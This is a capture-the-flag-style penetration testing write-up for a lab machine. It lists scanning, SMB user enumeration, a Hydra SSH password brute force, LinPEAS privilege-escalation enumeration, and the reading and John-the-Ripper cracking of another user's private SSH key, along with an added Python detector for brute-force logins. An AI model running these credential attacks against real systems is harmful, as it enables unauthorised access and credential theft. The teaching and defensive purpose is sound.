Basic Pentesting

1. Reconnaissance and Scanning

export TARGET_IP=10.10.195.185
nmap -p- --min-rate 5000 $TARGET_IP -oN nmap_fullscan.txt

Results:

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8009/tcp open  ajp13
8080/tcp open  http-proxy

Key Observations:

  • SSH (Port 22): Secure Shell, used for remote command-line access.
  • HTTP (Port 80): Standard web server port.
  • NetBIOS/SMB (Ports 139, 445): Windows file sharing and network services.
  • AJP13 (Port 8009): Apache JServ Protocol, often used with Apache Tomcat.
  • HTTP-Proxy (Port 8080): Another HTTP-related service, potentially an alternative web server or proxy.

1.1. Web Directory Enumeration (Feroxbuster)

A directory brute-force attack was performed on the web server (port 80) to identify hidden directories and files:

feroxbuster -u http://10.10.195.185 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 -o feroxbuster_scan.txt --no-state

Results:

http://10.10.195.185/development/  (Directory Listing Enabled)

2. Directory Listing Analysis and Information Gathering

Browsing to http://10.10.195.185/development/ revealed two text files: dev.txt and j.txt. These files contained valuable information:

2.1. dev.txt Analysis:

  • Apache Struts 2: The developer ("K") mentions using Apache Struts 2, specifically version 2.5.12 (REST plugin). This is a critical finding, as Struts 2 has a history of vulnerabilities.
  • SMB Configured: Confirmation that SMB is configured.
  • Apache Setup: Confirmation of Apache web server.

2.2. j.txt Analysis:

  • Weak Password Policy: "K" mentions cracking "J's" password easily, indicating a weak password policy.

3. User Enumeration and Password Cracking

3.1. SMB User Enumeration (enum4linux)

enum4linux was used to enumerate users via the SMB service:

enum4linux -a 10.10.195.185 > enum4linux_results.txt

Results:

Two users were identified:

  • kay
  • jan

3.2. SSH Password Brute-Force (Hydra)

A brute-force attack was attempted against the SSH service for the user jan, using the rockyou.txt wordlist:

hydra -V -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.195.185 -f -o hydra_results.txt

Results:

  • Successful login for jan with password armando.
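
From the defender's side, a run like the one above leaves a burst of "Failed password" lines followed by one "Accepted password" for the same user from the same source in /var/log/auth.log. The following Python is an added example (not part of the original write-up) that parses constructed sshd log lines and flags exactly that pattern; the hostname, source address, timestamps and the year used for parsing are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# sshd logs password authentication in these two message shapes.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+ ssh2"
)

def parse(line):
    """Return (timestamp, outcome, user, src) or None for unrelated lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; a fixed year (assumption) keeps ordering.
    ts = datetime.strptime("2024 " + m["ts"], "%Y %b %d %H:%M:%S")
    return ts, m["outcome"], m["user"], m["src"]

def find_bruteforce_logins(lines, threshold=5, window_s=60):
    """Return (user, src, n_failures) for each accepted login preceded by at
    least `threshold` failures for that user from that source within window_s."""
    failures = defaultdict(list)  # (user, src) -> recent failure timestamps
    hits = []
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        ts, outcome, user, src = ev
        key = (user, src)
        # keep only failures still inside the sliding window
        failures[key] = [t for t in failures[key] if (ts - t).total_seconds() <= window_s]
        if outcome == "Failed":
            failures[key].append(ts)
        elif len(failures[key]) >= threshold:
            hits.append((user, src, len(failures[key])))
            failures[key].clear()
    return hits

# Constructed sample: a wordlist run against jan from one source, then a normal login by kay.
SAMPLE_LOG = [
    f"Mar 10 14:02:{s:02d} target sshd[{1200 + s}]: Failed password for jan "
    f"from 10.10.14.5 port {40000 + s} ssh2" for s in range(1, 7)
] + [
    "Mar 10 14:02:08 target sshd[1208]: Accepted password for jan from 10.10.14.5 port 40008 ssh2",
    "Mar 10 14:30:00 target sshd[1301]: Failed password for kay from 10.10.14.9 port 50000 ssh2",
    "Mar 10 14:30:05 target sshd[1302]: Accepted password for kay from 10.10.14.9 port 50001 ssh2",
]
```

find_bruteforce_logins(SAMPLE_LOG) returns [('jan', '10.10.14.5', 6)]: kay's single typo before a successful login stays below the threshold and is not reported.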

4. Initial Access and Privilege Escalation

4.1. SSH Login

Successful login to the system via SSH using the cracked credentials:

ssh jan@10.10.195.185

4.2. System Enumeration (LinPEAS)

To identify potential privilege escalation vectors, LinPEAS (Linux Privilege Escalation Awesome Script) was transferred to the target and executed:

Attacker machine:

scp linpeas.sh jan@10.10.195.185:/tmp

Target machine (as jan):

ssh jan@10.10.195.185
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh > linpeas_output.txt

  • /tmp is commonly used as a staging directory for files placed on the target, because it is world-writable.

Key Finding (LinPEAS):

LinPEAS identified a potential private SSH key for the user kay located at /home/kay/.ssh/id_rsa.

4.3. SSH Key Retrieval and Cracking

  • The id_rsa file was read from jan's account. Because jan does not have write access to kay's home directory, the file could not be copied directly with scp; instead, its contents were printed to the terminal and copied manually.
  • The key was saved locally to a file named id_rsa_kay.
  • ssh2john was used to convert the key into a format suitable for John the Ripper.
  • John the Ripper was used to crack the passphrase protecting the private key.

cat /home/kay/.ssh/id_rsa # (On target, as jan, copy output)
# ... (On attacker machine) ...
echo "PASTE_COPIED_KEY_HERE" > id_rsa_kay
ssh2john id_rsa_kay > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Result:

  • The passphrase for kay's SSH key was cracked: beeswax.

4.4. Privilege Escalation (SSH as kay)

Using the cracked passphrase and the private key, successful login as kay was achieved:

ssh -i id_rsa_kay kay@10.10.195.185

4.5. Final Password Retrieval

The pass.bak file was found and read, revealing the final password:

cat pass.bak